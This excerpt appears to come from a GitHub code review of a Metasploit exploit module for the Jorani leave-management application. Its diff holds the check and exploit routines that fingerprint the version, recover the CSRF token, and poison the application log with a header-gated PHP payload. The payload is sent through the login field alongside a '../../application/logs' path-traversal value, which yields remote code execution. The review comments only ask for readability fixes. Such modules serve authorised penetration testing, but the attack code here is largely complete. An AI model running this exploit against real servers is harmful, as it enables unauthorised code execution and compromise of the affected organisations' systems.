modules/exploits/multi/php/jorani_path_trav.rb

```diff
@@ -0,0 +1,164 @@
+                      'Notes' =>
+                      {
+                        'Stability' => [CRASH_SAFE],
+                        'Reliability' => [REPEATABLE_SESSION],
+                        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+                      })
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])
+      ]
+    )
+  end
+
+  def get_version(res)
+    matches = res.body.scan(/&nbsp;v([0-9.]+)&nbsp;&copy;/i)
+    if matches[0].nil?
+      print_error('Cannot recovered Jorani version...')
+      return nil
+    end
+    matches[0][0]
+  end
+
+  def service_running(res)
+    matches = res.body.scan(/Leave Management System/)
+    if matches[0].nil?
+      print_error("Jorani doesn't appears to be running on the target")
+      return false
+    end
+    true
+  end
+
+  def recover_csrf(res)
+    matches = res.body.scan(/<input type="hidden" name="csrf_test_jorani" value="(.*?)"/)
+    return matches[0][0] if matches.length == 1 && matches[0].length == 1
+
+    ''
+  end
+
+  def check
+    # For the check command
+    print_status('Checking Jorani version')
+    uri = normalize_uri(target_uri.path, 'index.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => "#{uri}/session/login"
+    )
+
+    return Exploit::CheckCode::Safe unless service_running(res)
+
+    print_good('Jorani seems to be running on the target !')
+
+    current_version = get_version(res)
+    return Exploit::CheckCode::Detected if current_version.nil?
+
+    print_good("Found version: #{current_version}")
+    current_version = Gem::Version.new(current_version)
+
+    return Exploit::CheckCode::Vulnerable if current_version <= Gem::Version.new('1.0.0')
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    # Main function
+    print_status('Trying to exploit LFI')
+
+    path_trav_payload = '../../application/logs'
+    header_name = (0...14).map { ('A'..'Z').to_a[rand(26)] }.join
+    poison_payload = "<?php if(isset($_SERVER['HTTP_#{header_name}'])){ #{payload.encoded} } ?>"
+    log_file_name = "log-#{Time.now.strftime('%Y-%m-%d')}"
+
+    uri = normalize_uri(target_uri.path, 'index.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'uri' => "#{uri}/session/login"
+    )
+
+    print_status('Recovering CSRF token')
+    csrf_tok = recover_csrf(res)
+    if csrf_tok != ''
+      print_good("CSRF found: #{csrf_tok}")
+    else
+      print_status("CSRF not found, doesn't mean its not vulnerable")
+    end
+    print_status('Poisonning log with payload..')
+    print_status('Sending 1st payload')
+
+    send_request_cgi(
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'uri' => "#{uri}/session/login",
+      'data' => "csrf_test_jorani=#{csrf_tok}&last_page=session/login&language=#{path_trav_payload}&login=#{Rex::Text.uri_encode(poison_payload)}&CipheredValue=DummyPassword"
```

Comment:
Can you put each key-value pair on their own line, to make this more readable?
Also, is `DummyPassword` a required string? If not, it should be randomized.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/18123/commits/8cae031d9765e7a400adff5fb12efb2c9b5fd441, have a further enhancement but I'll make a separate comment for that.